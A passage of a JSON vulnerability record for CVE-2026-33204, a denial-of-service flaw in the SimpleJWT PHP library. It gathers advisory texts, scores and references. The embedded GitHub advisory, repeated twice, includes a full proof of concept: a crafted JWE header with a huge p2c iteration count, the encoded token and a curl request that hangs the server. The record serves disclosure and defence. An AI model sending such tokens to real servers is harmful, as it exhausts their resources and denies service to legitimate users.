\nBecause the header is processed before successful decryption and authentication, the attack can be triggered using an invalid JWE, meaning authentication is not required.\n\n## Proof of Concept\n\nSpin up a simple PHP server which accepts a JWE as input and tries to decrypt the user supplied JWE.\n\n```bash\nmkdir simplejwt-poc\ncd simplejwt-poc\ncomposer install\ncomposer require kelvinmo/simplejwt\nphp -S localhost:8000\n```\n\nThe content of `index.php`:\n\n```php\n<?php\n\nrequire __DIR__ . '/vendor/autoload.php';\n\n$set = SimpleJWT\\Keys\\KeySet::createFromSecret('secret123');\n\n$uri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);\n$method = $_SERVER['REQUEST_METHOD'];\n\nif ($uri === '/encrypt' && $method === 'GET') {\n    // Note $headers['alg'] and $headers['enc'] are required\n    $headers = ['alg' => 'PBES2-HS256+A128KW', 'enc' => 'A256CBC-HS512'];\n    $plaintext = 'This is the plaintext I want to encrypt.';\n    $jwe = new SimpleJWT\\JWE($headers, $plaintext);\n\n    try {\n        echo \"Encrypted JWE: \" . $jwe->encrypt($set);\n    } catch (\\RuntimeException $e) {\n        echo $e;\n    }\n}\n\nelseif ($uri === '/decrypt' && $method === 'GET') {\n    try {\n        $jwe = $_GET['s'];\n        $jwe = SimpleJWT\\JWE::decrypt($jwe, $set, 'PBES2-HS256+A128KW');\n    } catch (SimpleJWT\\InvalidTokenException $e) {\n        echo $e;\n    }\n    echo $jwe->getHeader('alg') . \"<br>\";\n    echo $jwe->getHeader('enc') . \"<br>\";\n    echo $jwe->getPlaintext() . 
\"<br>\";\n    }\n\nelse {\n    http_response_code(404);\n    echo \"Route not found\";\n}\n\n?>\n```\n\nWe have to craft a JWE (even unsigned and unencrypted) with this header, notice the extremely large p2c value (more than 400 billion iterations):\n\n```json\n{\n    \"alg\": \"PBES2-HS256+A128KW\",\n    \"enc\": \"A128CBC-HS256\",\n    \"p2s\": \"blablabla\",\n    \"p2c\": 409123223136\n}\n```\n\nThe final JWE with poisoned header: `eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla`.\n\nNotice that only the header needs to be valid Base64URL JSON, the remaining JWE segments can contain arbitrary data.\n\nPerform the following request to the server (which tries to derive the PBES2 key):\n\n```bash\ncurl --path-as-is -i -s -k -X $'GET' \\\n    -H $'Host: localhost:8000' \\\n    $'http://localhost:8000/decrypt?s=eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla'\n```\n\nThe request blocks the worker until the PHP execution timeout is reached, shutting down the server:\n\n```console\n[Sun Mar 15 11:42:18 2026] PHP 8.4.11 Development Server (http://localhost:8000) started\n[Sun Mar 15 11:42:20 2026] 127.0.0.1:38532 Accepted\n\nFatal error: Maximum execution time of 30+2 seconds exceeded (terminated) in /home/edoardottt/hack/test/simplejwt-poc/vendor/kelvinmo/simplejwt/src/SimpleJWT/Crypt/KeyManagement/PBES2.php on line 168\n```\n\n## Impact\n\nAn attacker can send a crafted JWE with an extremely large `p2c` value to force the server to perform a very large number of PBKDF2 iterations.  \nThis causes excessive CPU consumption during key derivation and blocks the request worker until execution limits are reached.  \nRepeated requests can exhaust server resources and make the application unavailable to legitimate users.\n\n## Credits \n\nEdoardo Ottavianelli (@edoardottt)",
                    "title": "github - https://api.github.com/advisories/GHSA-xw36-67f8-339x"
                },
                {
                    "category": "description",
                    "text": "SimpleJWT is a simple JSON web token library written in PHP. Prior to version 1.1.1, an unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected. This issue has been patched in version 1.1.1.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33204"
                },
                {
                    "category": "description",
                    "text": "SimpleJWT is a simple JSON web token library written in PHP. Prior to version 1.1.1, an unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected. This issue has been patched in version 1.1.1.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33204.json"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in SimpleJWT, a PHP library for JSON Web Tokens. An unauthenticated attacker can exploit this vulnerability by tampering with JSON Web Encryption (JWE) headers when Password-Based Key Derivation Function 2 (PBES2) algorithms are in use. This can lead to a Denial of Service (DoS) if an application calls JWE::decrypt() on attacker-controlled JWEs, making the affected application unavailable.",
                    "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33204.json"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nAn unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used.  \nApplications that call `JWE::decrypt()` on attacker-controlled JWEs using PBES2 algorithms are affected.\n\n## Details\n\nPHP version: `PHP 8.4.11`\nSimpleJWT version: `v1.1.0`\n\nThe relevant portion of the vulnerable implementation is shown below ([PBES2.php](https://github.com/kelvinmo/simplejwt/blob/edb7807a240b72c59e72d7dca31add9d16555f9f/src/SimpleJWT/Crypt/KeyManagement/PBES2.php)):\n\n```PHP\n<?php\n/* ... SNIP ... */\nclass PBES2 extends BaseAlgorithm implements KeyEncryptionAlgorithm {\n    use AESKeyWrapTrait;\n\n    /** @var array<string, mixed> $alg_params */\n    static protected $alg_params = [\n        'PBES2-HS256+A128KW' => ['hash' => 'sha256'],\n        'PBES2-HS384+A192KW' => ['hash' => 'sha384'],\n        'PBES2-HS512+A256KW' => ['hash' => 'sha512']\n    ];\n\n    /** @var truthy-string $hash_alg */\n    protected $hash_alg;\n\n    /** @var int $iterations */\n    protected $iterations = 4096;\n    \n    /* ... SNIP ... */\n\n    /**\n     * Sets the number of iterations to use in PBKFD2 key generation.\n     *\n     * @param int $iterations number of iterations\n     * @return void\n     */\n    public function setIterations(int $iterations) {\n        $this->iterations = $iterations;\n    }\n    \n    /* ... SNIP ... 
*/\n\n    /**\n     * {@inheritdoc}\n     */\n    public function decryptKey(string $encrypted_key, KeySet $keys, array $headers, ?string $kid = null): string {\n        /** @var SymmetricKey $key */\n        $key = $this->selectKey($keys, $kid);\n        if ($key == null) {\n            throw new CryptException('Key not found or is invalid', CryptException::KEY_NOT_FOUND_ERROR);\n        }\n        if (!isset($headers['p2s']) || !isset($headers['p2c'])) {\n            throw new CryptException('p2s or p2c headers not set', CryptException::INVALID_DATA_ERROR);\n        }\n\n        $derived_key = $this->generateKeyFromPassword($key->toBinary(), $headers);\n        return $this->unwrapKey($encrypted_key, $derived_key, $headers);\n    }\n    \n    /* ... SNIP ... */\n\n    /**\n     * @param array<string, mixed> $headers\n     */\n    private function generateKeyFromPassword(string $password, array $headers): string {\n        $salt = $headers['alg'] . \"\\x00\" . Util::base64url_decode($headers['p2s']);\n        /** @var int<0, max> $length */\n        $length = intdiv($this->getAESKWKeySize(), 8);\n\n        return hash_pbkdf2($this->hash_alg, $password, $salt, $headers['p2c'], $length, true);\n    }\n}\n?>\n```\n\nThe security flaw lies in the lack of input validation when handling JWEs that use PBES2.  \nA \"sanity ceiling\" is not set on the iteration count, which is the parameter known in the JWE specification as `p2c` ([RFC7518](https://datatracker.ietf.org/doc/html/rfc7518#section-4.8.1.2)).  \nThe library calls `decryptKey()` with the untrusted input `$headers`, which then uses the PHP function `hash_pbkdf2()` with the user-supplied value `$headers['p2c']`.\n\nThis results in an algorithmic-complexity denial-of-service (CPU exhaustion) because the PBKDF2 iteration count is fully attacker-controlled.  
\nBecause the header is processed before successful decryption and authentication, the attack can be triggered using an invalid JWE, meaning authentication is not required.\n\n## Proof of Concept\n\nSpin up a simple PHP server which accepts a JWE as input and tries to decrypt the user supplied JWE.\n\n```bash\nmkdir simplejwt-poc\ncd simplejwt-poc\ncomposer install\ncomposer require kelvinmo/simplejwt\nphp -S localhost:8000\n```\n\nThe content of `index.php`:\n\n```php\n<?php\n\nrequire __DIR__ . '/vendor/autoload.php';\n\n$set = SimpleJWT\\Keys\\KeySet::createFromSecret('secret123');\n\n$uri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);\n$method = $_SERVER['REQUEST_METHOD'];\n\nif ($uri === '/encrypt' && $method === 'GET') {\n    // Note $headers['alg'] and $headers['enc'] are required\n    $headers = ['alg' => 'PBES2-HS256+A128KW', 'enc' => 'A256CBC-HS512'];\n    $plaintext = 'This is the plaintext I want to encrypt.';\n    $jwe = new SimpleJWT\\JWE($headers, $plaintext);\n\n    try {\n        echo \"Encrypted JWE: \" . $jwe->encrypt($set);\n    } catch (\\RuntimeException $e) {\n        echo $e;\n    }\n}\n\nelseif ($uri === '/decrypt' && $method === 'GET') {\n    try {\n        $jwe = $_GET['s'];\n        $jwe = SimpleJWT\\JWE::decrypt($jwe, $set, 'PBES2-HS256+A128KW');\n    } catch (SimpleJWT\\InvalidTokenException $e) {\n        echo $e;\n    }\n    echo $jwe->getHeader('alg') . \"<br>\";\n    echo $jwe->getHeader('enc') . \"<br>\";\n    echo $jwe->getPlaintext() . 
\"<br>\";\n    }\n\nelse {\n    http_response_code(404);\n    echo \"Route not found\";\n}\n\n?>\n```\n\nWe have to craft a JWE (even unsigned and unencrypted) with this header, notice the extremely large p2c value (more than 400 billion iterations):\n\n```json\n{\n    \"alg\": \"PBES2-HS256+A128KW\",\n    \"enc\": \"A128CBC-HS256\",\n    \"p2s\": \"blablabla\",\n    \"p2c\": 409123223136\n}\n```\n\nThe final JWE with poisoned header: `eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla`.\n\nNotice that only the header needs to be valid Base64URL JSON, the remaining JWE segments can contain arbitrary data.\n\nPerform the following request to the server (which tries to derive the PBES2 key):\n\n```bash\ncurl --path-as-is -i -s -k -X $'GET' \\\n    -H $'Host: localhost:8000' \\\n    $'http://localhost:8000/decrypt?s=eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJzIjoiYmxhYmxhYmxhIiwicDJjIjo0MDkxMjMyMjMxMzZ9.bla.bla.bla.bla'\n```\n\nThe request blocks the worker until the PHP execution timeout is reached, shutting down the server:\n\n```console\n[Sun Mar 15 11:42:18 2026] PHP 8.4.11 Development Server (http://localhost:8000) started\n[Sun Mar 15 11:42:20 2026] 127.0.0.1:38532 Accepted\n\nFatal error: Maximum execution time of 30+2 seconds exceeded (terminated) in /home/edoardottt/hack/test/simplejwt-poc/vendor/kelvinmo/simplejwt/src/SimpleJWT/Crypt/KeyManagement/PBES2.php on line 168\n```\n\n## Impact\n\nAn attacker can send a crafted JWE with an extremely large `p2c` value to force the server to perform a very large number of PBKDF2 iterations.  \nThis causes excessive CPU consumption during key derivation and blocks the request worker until execution limits are reached.  \nRepeated requests can exhaust server resources and make the application unavailable to legitimate users.\n\n## Credits \n\nEdoardo Ottavianelli (@edoardottt)",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-xw36-67f8-339x.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00044",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "4.0",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is cwe data available from source Nvd, There is product_remediation data available from source Redhat",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 2\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5878157",
                    "CSAFPID-1508257",
                    "CSAFPID-5891491",
                    "CSAFPID-5891492",
                    "CSAFPID-5891493",
                    "CSAFPID-5891494",
                    "CSAFPID-5912938",
                    "CSAFPID-5912939",
                    "CSAFPID-5912940",
                    "CSAFPID-5912941",
                    "CSAFPID-5912942",
                    "CSAFPID-5912943",
                    "CSAFPID-5912944",
                    "CSAFPID-5912945",
                    "CSAFPID-5912946",
                    "CSAFPID-5912947",
                    "CSAFPID-5912948",
                    "CSAFPID-5912949",
                    "CSAFPID-5912950",
                    "CSAFPID-5912951",
                    "CSAFPID-5912952",
                    "CSAFPID-5912953",
                    "CSAFPID-5912954",
                    "CSAFPID-5912955",
                    "CSAFPID-5912956",
                    "CSAFPID-5912957",
                    "CSAFPID-5912958",
                    "CSAFPID-5912959",
                    "CSAFPID-5912960",
                    "CSAFPID-5912961",
                    "CSAFPID-5912962",
                    "CSAFPID-5912963",
                    "CSAFPID-5912964",
                    "CSAFPID-5912965",
                    "CSAFPID-5912966",
                    "CSAFPID-5912967",
                    "CSAFPID-5912968",
                    "CSAFPID-5912969",
                    "CSAFPID-5912970",
                    "CSAFPID-5912971",
                    "CSAFPID-5912972",
                    "CSAFPID-5912973",
                    "CSAFPID-5912974",
                    "CSAFPID-5912975",
                    "CSAFPID-5912976",
                    "CSAFPID-5912977",
                    "CSAFPID-5912978",
                    "CSAFPID-5912979"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-xw36-67f8-339x"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-xw36-67f8-339x"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-xw36-67f8-339x"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33204"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33204.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33204.json"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-xw36-67f8-339x.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/kelvinmo/simplejwt/security/advisories/GHSA-xw36-67f8-339x"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-xw36-67f8-339x"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/kelvinmo/simplejwt/releases/tag/v1.1.1"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-33204"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33204"
                }
            ],
            "remediations": [
                {
                    "category": "mitigation",
                    "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
                    "product_ids": [
                        "CSAFPID-1508257",
                        "CSAFPID-5891491",
                        "CSAFPID-5891492",
                        "CSAFPID-5891493",
                        "CSAFPID-5891494"
                    ]
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                        "baseScore": 7.5,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-1508257",
                        "CSAFPID-5878157",
                        "CSAFPID-5891491",
                        "CSAFPID-5891492",
                        "CSAFPID-5891493",
                        "CSAFPID-5891494",
                        "CSAFPID-5912938",
                        "CSAFPID-5912939",
                        "CSAFPID-5912940",
                        "CSAFPID-5912941",
                        "CSAFPID-5912942",
                        "CSAFPID-5912943",
                        "CSAFPID-5912944",
                        "CSAFPID-5912945",
                        "CSAFPID-5912946",
                        "CSAFPID-5912947",
                        "CSAFPID-5912948",
                        "CSAFPID-5912949",
                        "CSAFPID-5912950",
                        "CSAFPID-5912951",
                        "CSAFPID-5912952",
                        "CSAFPID-5912953",
                        "CSAFPID-5912954",
                        "CSAFPID-5912955",
                        "CSAFPID-5912956",
                        "CSAFPID-5912957",
                        "CSAFPID-5912958",
                        "CSAFPID-5912959",
                        "CSAFPID-5912960",
                        "CSAFPID-5912961",
                        "CSAFPID-5912962",
                        "CSAFPID-5912963",
                        "CSAFPID-5912964",
                        "CSAFPID-5912965",
                        "CSAFPID-5912966",
                        "CSAFPID-5912967",
                        "CSAFPID-5912968",
                        "CSAFPID-5912969",
                        "CSAFPID-5912970",
                        "CSAFPID-5912971",
                        "CSAFPID-5912972",
                        "CSAFPID-5912973",
                        "CSAFPID-5912974",
                        "CSAFPID-5912975",
                        "CSAFPID-5912976",
                        "CSAFPID-5912977",
                        "CSAFPID-5912978",
                        "CSAFPID-5912979"
                    ]
                }
            ],
            "title": "CVE-2026-33204"
        }
    ]
}